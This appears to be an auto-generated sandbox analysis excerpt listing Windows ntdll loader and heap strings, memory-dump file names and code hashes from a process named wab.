                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  • Opcode ID: 929ac026e1aaba85ee49cce966bfaef7a3c7b5e78340aa3959c3442ef618ed99
                                                  • Instruction ID: e08145719e0269f0e14505f3c7446935dfda1d5515b7cce3bee0916cd8a1f541
                                                  • Opcode Fuzzy Hash: 929ac026e1aaba85ee49cce966bfaef7a3c7b5e78340aa3959c3442ef618ed99
                                                  • Instruction Fuzzy Hash: 7FF18FB5E002298FDB20CF65CC84BE9B3B5AF44305F4581EADA49AB341E735AE81CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • 'LDR: %s(), invalid image format of MUI file , xrefs: 1FE03AB4
                                                  • {, xrefs: 1FE03ABD
                                                  • LdrpLoadResourceFromAlternativeModule, xrefs: 1FE03AAF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                  • API String ID: 0-1697150599
                                                  • Opcode ID: 3d64a60f78eb16fbafa15d5c962493f0bc0d30181414d97d0d99571fa3f1d194
                                                  • Instruction ID: fe4584f837ee6a08a754e1e0a7dd61cb86f0d35723980c81368b5e31052d03b9
                                                  • Opcode Fuzzy Hash: 3d64a60f78eb16fbafa15d5c962493f0bc0d30181414d97d0d99571fa3f1d194
                                                  • Instruction Fuzzy Hash: A1E17B356083818BD784CF24C590B6BB7E1BF84744F094E2DF8958B390E776E946CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • Failed to allocated memory for shimmed module list, xrefs: 1FE0A10F
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 1FE0A121
                                                  • LdrpCheckModule, xrefs: 1FE0A117
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-161242083
                                                  • Opcode ID: 0ecb077e646e14f13fe88b915b09670ca180886424a92aa9eaa910e407eba5fb
                                                  • Instruction ID: 584be725f7c76132cc048eb832dd0275c4f4fe70ff40dc2448f3a43036ceb9d5
                                                  • Opcode Fuzzy Hash: 0ecb077e646e14f13fe88b915b09670ca180886424a92aa9eaa910e407eba5fb
                                                  • Instruction Fuzzy Hash: 6A71D374A002069FCB48EF68CA88ABEB7F5FF45714F14416ED516DB250E736B981CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  • Opcode ID: 17b7513f092260e4e46ad67e68a76ddfdac3d7d4cc85d771a84c53c146101545
                                                  • Instruction ID: 055af118252258b0b18ea2a1c2ace9b462a6bdfb3d73ed4509ddc45533a11003
                                                  • Opcode Fuzzy Hash: 17b7513f092260e4e46ad67e68a76ddfdac3d7d4cc85d771a84c53c146101545
                                                  • Instruction Fuzzy Hash: 5A61DE75610341DFDB58CF24C884B6ABBE1FF46304F14855EE48A8F296D774E881CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1FD9CD34
                                                  • @, xrefs: 1FD9CD63
                                                  • InstallLanguageFallback, xrefs: 1FD9CD7F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                  • API String ID: 0-1757540487
                                                  • Opcode ID: 5c152cd505f36b206b99c52da9390382bf7cd1417e64777a9252bc0f36ebd476
                                                  • Instruction ID: 82561abb3fb3f6f877d6e4b34b231a448d749f43ac762413fec8795ce57b7958
                                                  • Opcode Fuzzy Hash: 5c152cd505f36b206b99c52da9390382bf7cd1417e64777a9252bc0f36ebd476
                                                  • Instruction Fuzzy Hash: BF51A17A5143569BC780CF64C444BBBB7E8BF88754F42092EF989D7240F734EA058BA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • HEAP: , xrefs: 1FE4DC1F
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 1FE4DC32
                                                  • HEAP[%wZ]: , xrefs: 1FE4DC12
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 4ecb8a5ec28ab89ffc8bf2e0521aaffd492f85bd2e37d38d28ffef2f8c015662
                                                  • Instruction ID: 06bdbcad429dea38a11e6b3667bae4e03d9fb0e4168de3e0229643ebee8f4bb6
                                                  • Opcode Fuzzy Hash: 4ecb8a5ec28ab89ffc8bf2e0521aaffd492f85bd2e37d38d28ffef2f8c015662
                                                  • Instruction Fuzzy Hash: 4D512535110250CAE774CF29E8A47B273E2EF45748F21894EE4C2CBA81E277E847DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • HEAP: , xrefs: 1FDFFB58
                                                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1FDFFB63
                                                  • HEAP[%wZ]: , xrefs: 1FDFFB4B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                  • API String ID: 0-1596344177
                                                  • Opcode ID: e097094806329858bd0ec2a6528d25cda5778576c2e85413528433dbe6afe944
                                                  • Instruction ID: 7c41a8da71f6f30c9c70d0eaca7a73e108bd29ef71d605b9d689498a15e47205
                                                  • Opcode Fuzzy Hash: e097094806329858bd0ec2a6528d25cda5778576c2e85413528433dbe6afe944
                                                  • Instruction Fuzzy Hash: 4451AB35A00255EFCB44CF64C484AAABBB1FF4A350F558299D8549F282E732FD42CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  • Opcode ID: 0bba60afe4c1aa70693a2f13b6eed790c7391b0d74175e5dea4bb6c918707ad7
                                                  • Instruction ID: ef0848709b8859913289754896ef0f4a89bdefbc0fab7b8c7b411081b0f8d295
                                                  • Opcode Fuzzy Hash: 0bba60afe4c1aa70693a2f13b6eed790c7391b0d74175e5dea4bb6c918707ad7
                                                  • Instruction Fuzzy Hash: E511B4353252819FDB98DB24C888BBAB3A5EF82719F55825EE40BCF250DB34E844C755
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • LdrResSearchResource Exit, xrefs: 1FDAAA25
                                                  • LdrResSearchResource Enter, xrefs: 1FDAAA13
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                  • API String ID: 0-4066393604
                                                  • Opcode ID: e5471b7fb332b42f1e9d576784325f78d00e8463e54db30bbfc4bf5fe1587755
                                                  • Instruction ID: 465798cdd0e14d338f3eb5f0e131c4b0371946a799b7307f02344d018b016731
                                                  • Opcode Fuzzy Hash: e5471b7fb332b42f1e9d576784325f78d00e8463e54db30bbfc4bf5fe1587755
                                                  • Instruction Fuzzy Hash: E5E19275E00359EFEB51DFA4C980BEEB7B9EF48354F10422AE801EB290E735A941CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @4Cw@4Cw$PATH
                                                  • API String ID: 0-1794901795
                                                  • Opcode ID: a3d0f906479d6db763b2e9c50f27fe2886e6b95043fa22512f251c2393c18d52
                                                  • Instruction ID: 1e2a4f200432a45db342c8cc17f6d47ccbb52ad170ef9b1a43286568bfe65a5f
                                                  • Opcode Fuzzy Hash: a3d0f906479d6db763b2e9c50f27fe2886e6b95043fa22512f251c2393c18d52
                                                  • Instruction Fuzzy Hash: 1BF1D175D00218DBCB55DFA9C881AFEB7B2FF48310F45402AE444AB240EBB7A851CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$AddD
                                                  • API String ID: 0-2525844869
                                                  • Opcode ID: 5e54bbc084a393e0bfec1fa5ff565ee2ba680cc730d93c851c8836b2a4a15396
                                                  • Instruction ID: 9b7d8bd445bbc3c2397538968e0cbfdef87c807a67cd3292332c2b352e8e6be6
                                                  • Opcode Fuzzy Hash: 5e54bbc084a393e0bfec1fa5ff565ee2ba680cc730d93c851c8836b2a4a15396
                                                  • Instruction Fuzzy Hash: 19A16976608344AFE315CF54C845BABB7E9FF84705F504A2EF99486290F7B4EA04CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$TargetPath
                                                  • API String ID: 0-4164548946
                                                  • Opcode ID: d75be594d02212c55338619edb8a859e6e1946cfc70fee6e1d29b3c3f93917bf
                                                  • Instruction ID: 575ab50a471d5346a887dfbbf5a290cf8a1c6f7d079168579ea26f5a868328a6
                                                  • Opcode Fuzzy Hash: d75be594d02212c55338619edb8a859e6e1946cfc70fee6e1d29b3c3f93917bf
                                                  • Instruction Fuzzy Hash: 4D81F3759087569FD710CF29C884BABB7A8BF84718F414A2DF9859F250E331EC05CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • LdrpResGetMappingSize Exit, xrefs: 1FDAAC7C
                                                  • LdrpResGetMappingSize Enter, xrefs: 1FDAAC6A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                  • API String ID: 0-1497657909
                                                  • Opcode ID: e0dd566b98f35c6e8d6b38a6eeca54314cf68038639fd20fde43c1e209b58ada
                                                  • Instruction ID: afb647f94afcee2fc1b1575cd45a53db3b99615b219978ba4e45650d87b7df9f
                                                  • Opcode Fuzzy Hash: e0dd566b98f35c6e8d6b38a6eeca54314cf68038639fd20fde43c1e209b58ada
                                                  • Instruction Fuzzy Hash: 3B61C075A00786DFEB51CFA8C880BAEB7B4FF44715F04062AE851EB290E779E940C765
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: fe0eceea20420499677cddeed389bd1ea3d2c248066d241b3a19d2ceaf2d3554
                                                  • Instruction ID: eb05461117346a179eb7785bd1da54d003737600e9ebe462f75fd07178c52d94
                                                  • Opcode Fuzzy Hash: fe0eceea20420499677cddeed389bd1ea3d2c248066d241b3a19d2ceaf2d3554
                                                  • Instruction Fuzzy Hash: B3518CB1E003998FCB55CF99C4846ADFBF4FF46718F15802AE0499F290EB70A985CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 1FE12807
                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 1FE1280C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                  • API String ID: 0-2104531740
                                                  • Opcode ID: c2f6c46e9a3e38c24a1beb37cb5b92f54457d422047d1bb7b73a202ab2ded478
                                                  • Instruction ID: 0c1edec6a345feba0b0b90439e53ec2da33ad04c9072e2141e1de992f2b3ae2c
                                                  • Opcode Fuzzy Hash: c2f6c46e9a3e38c24a1beb37cb5b92f54457d422047d1bb7b73a202ab2ded478
                                                  • Instruction Fuzzy Hash: D841F2B6605206EBD715CF66C840AABF7B5FF95B10F21852DE8848F680E730ED41CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 1FDE1025
                                                  • @, xrefs: 1FDE1050
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                  • API String ID: 0-2976085014
                                                  • Opcode ID: 3e733220c1c43e1fa38dc8be763743616fec5abfc94b775346d4f6d940cf4bfd
                                                  • Instruction ID: f64ca3e4af7666b870985b547280bdb313b4d4a392e7836dbf238b4dcc6ccb07
                                                  • Opcode Fuzzy Hash: 3e733220c1c43e1fa38dc8be763743616fec5abfc94b775346d4f6d940cf4bfd
                                                  • Instruction Fuzzy Hash: 0E31C476A00688AFCB52DFA5CC44FEF7BB8EB84750F410525E501A7291DB74AD01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CWDIllegalInDLLSearch
                                                  • API String ID: 0-473384322
                                                  • Opcode ID: 829bcb10c921227444099a69595f2cdf883caa0a993a028043301f5fb6e67df2
                                                  • Instruction ID: 57233ec30e07df5e0161e2b8a20929c92d198fb606033d7284f46bf70aeb95f1
                                                  • Opcode Fuzzy Hash: 829bcb10c921227444099a69595f2cdf883caa0a993a028043301f5fb6e67df2
                                                  • Instruction Fuzzy Hash: 6C519E759047569FD311DE64CC81B6AB7E8BB44724F800A2EF961D7290F371E948CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AlternateCodePage
                                                  • API String ID: 0-3889302423
                                                  • Opcode ID: 8139fef68ba571dc2250f4f89c868b15afb72bdc4248a080971196b41d9e6831
                                                  • Instruction ID: 10d73a1fbbf46ca32a0a5cd57a0952464255ebc454df072ea17a6dd3301afee3
                                                  • Opcode Fuzzy Hash: 8139fef68ba571dc2250f4f89c868b15afb72bdc4248a080971196b41d9e6831
                                                  • Instruction Fuzzy Hash: 1C41B176D00249ABDF55DB94C880EFEB7B8FF85350F12415AE416E7294E630AA42CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                  • Instruction ID: 314ce9c2b86aee3c6a0f10d1543c88f265b47dd014c9c94dd52efa024e17f7c7
                                                  • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                  • Instruction Fuzzy Hash: C35138756047119FC321CF65C841B6BBBE8FF89710F008A2EF99597690E7B4E914CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeProcess
                                                  • API String ID: 0-2689506271
                                                  • Opcode ID: 6710fb9d592840778d80f34f75cbf89e38a0654369a36c01348002f01da38bb6
                                                  • Instruction ID: 260bd5c591df4ec34d1cd56e04777562af223be615789d01a917dafca21a182a
                                                  • Opcode Fuzzy Hash: 6710fb9d592840778d80f34f75cbf89e38a0654369a36c01348002f01da38bb6
                                                  • Instruction Fuzzy Hash: CA41D7B6405356AFD311DE61C984BABB7ECFB84724F00892FF291C6180E771E548CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1FDA0058
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                  • API String ID: 0-996340685
                                                  • Opcode ID: b6205112a16bb555212ec6b0a13656cdcaffafe694084e8a6955eae74312010a
                                                  • Instruction ID: 86edb3545bfcbae5b73613c22940473d653543513a46f2028201c5ed67083d30
                                                  • Opcode Fuzzy Hash: b6205112a16bb555212ec6b0a13656cdcaffafe694084e8a6955eae74312010a
